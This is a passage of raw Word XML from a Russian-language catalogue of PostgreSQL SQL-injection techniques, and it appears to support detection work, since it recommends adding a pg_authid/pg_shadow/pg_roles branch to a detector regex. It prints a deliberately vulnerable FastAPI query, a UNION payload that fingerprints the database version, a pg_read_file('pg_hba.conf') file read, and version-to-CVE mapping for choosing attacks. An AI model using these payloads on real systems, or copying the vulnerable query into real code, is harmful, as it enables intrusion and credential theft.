      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (видно через Payload A) — атакующий идентифицирует роли, которые могут быть целью SET ROLE для обхода RLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110329B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — после Payload B имеет смысл прочитать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_read_file('pg_hba.conf')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — там видно, какие подсети/пользователи имеют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trust</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>peer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (вход без пароля), это упрощает использование подобранных аккаунтов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41642387" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Детектора </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.8.1) добавить ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid|pg_shadow|pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>с разным risk_score</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid|pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 10 (post-exploitation после superuser, очень узкое legitimate use), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 6 (используется в ORM, более частые ложные срабатывания). Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.8.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B3C7E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410915A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Catalogs — pg_authid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148F8F1E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Views — pg_roles / pg_shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62722C44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Predefined Roles — pg_read_all_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511919A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Password Authentication — SCRAM-SHA-256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF9D331" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RFC 5802: SCRAM mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27C921" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>hashcat modes — PostgreSQL MD5 (m=12), SCRAM-SHA-256 (m=28600)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5BD806" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — pg_authid / pg_shadow extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B1A59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — PostgreSQL section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE9CB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.8.4 Fingerprinting — version(), GUC-параметры, pg_extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE6D19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Точная версия PG, ОС хоста, set установленных расширений и значения ключевых GUC-параметров — это входные данные для выбора применимых техник из всего остального документа: какие CVE из раздела 4 актуальны, доступны ли OOB-векторы (3.6 требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), работают ли RCE-цепочки (3.7 требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), какие пути к файлам подставлять в file-read payload-ы (3.6.3 — Linux vs Windows), какие пути обхода RLS из 3.17 применимы (зависит от минор-версии). На практике 3.8.4 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>первый</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запрос после получения точки инъекции, до 3.8.1/3.8.2: знание версии меняет последующие payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C2B68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C9E7A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/feed.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C8FEAF"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27DF53B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B9302"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1463936A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1AFB43"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65260431" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7BB73F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B31D7DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232E304" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253C1767" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/feed")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A8324" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def feed(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6465C2CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    topic: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEF6B06"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31E98745" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F71D7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3132F976" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"SELECT id, title, published_at FROM posts WHERE topic = '{topic}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B98EE6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF74D0"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5730FF4A"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0DBEAEC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Три колонки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timestamp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Метаданные приводятся к этим типам естественно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / строка / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>now()</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6743A331" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — `version()` (быстрый отпечаток)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D870A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Один вызов — major.minor, ОС, компилятор, дата сборки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1266BF6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Payload (подставляется вместо `topic`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACA0BF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, version(), now() --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0438EC81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5BD13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, published_at FROM posts WHERE topic = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C33BD3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, version(), now() --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDAD0C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ответа — строка вида:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7188A5A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PostgreSQL 16.4 (Debian 16.4-1.pgdg120+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22470002" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Что атакующий из этого извлекает за один запрос:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D82392" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Major version (16)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → определяет, какие CVE из раздела 4 применимы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D95F86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MERGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> есть с PG 15 → CVE-2023-39418 (R11) применим, если 15.x ≤ 15.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C325618" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> есть с PG 17 → CVE-2022-1552 (R15) уже не работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421DBC52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
